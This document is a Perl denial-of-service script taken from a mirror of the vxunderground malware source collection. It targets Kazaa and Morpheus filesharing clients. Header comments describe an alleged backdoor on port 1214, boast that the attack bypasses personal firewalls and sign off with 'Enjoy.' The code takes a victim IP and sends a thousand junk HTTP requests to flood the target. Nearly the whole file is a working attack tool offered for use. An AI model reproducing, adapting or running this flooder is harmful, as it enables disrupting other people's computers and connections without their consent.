mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-18 17:36:11 +00:00
58 lines
1.6 KiB
Plaintext
58 lines
1.6 KiB
Plaintext
#
|
|
#Kazaa/Morpheus Denial of Service Attack
|
|
#Coded by Paul Godfrey
|
|
#PaulG@Crackdealer.com
|
|
#
|
|
#Problem: Both Kazaa and Morpheus filesharing applications have "backdoors"
|
|
#which allow anonymous file access to their shared folder. What does this have
|
|
#to do with Denial of Service? Unlike connections made from other users
|
|
#of the applications, the number of connections to the backdoor cannot be
|
|
#regulated or detected by the client. This obviously will allow us to flood the
|
|
#server with requests and therefore use up all of the available bandwidth.
|
|
#Also due to the fact that most users have setup their firewall privileges so
|
|
#that Kazaa or Morpheus is allowed access to open connections to outside sources
|
|
#this attack will bypass most personal firewall clients such as Zone Alarm.
|
|
#
|
|
#Enjoy.
|
|
#
|
|
#Usage: ./km.pl -h victimip
|
|
|
|
use Socket;
|
|
use Getopt::Std;
|
|
|
|
getopts("h:", \%args);
|
|
|
|
print("\nK/M Denial of Service\n");
|
|
if (!defined $args{h}) {
|
|
print("Usage: km.pl -h victimip\n\n");
|
|
exit; }
|
|
|
|
$host = $args{h};
|
|
$target = inet_aton($host) || die("inet_aton problems; host doesn't exist?");
|
|
|
|
$trash="A"x100;
|
|
|
|
&exec_cmd($command);
|
|
|
|
sub exec_cmd {
|
|
for($count=1;$count<=1000;$count++)
|
|
{
|
|
sendraw("GET /\"$trash\" HTTP/1.0\n\n");
|
|
print("|");
|
|
}
|
|
print("\nData Sent.\n\n");
|
|
}
|
|
|
|
sub sendraw {
|
|
my ($pstr)=@_;
|
|
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
|
|
die("Socket problems\n");
|
|
if(connect(S,pack "SnA4x8",2,1214,$target)){
|
|
my @in;
|
|
select(S); $|=1; print $pstr;
|
|
while(< S >){ push @in, $_;
|
|
print STDOUT "." if(defined $args{X});}
|
|
select(STDOUT); close(S); return @in;
|
|
} else { die("Can't connect...\n"); }
|
|
}
|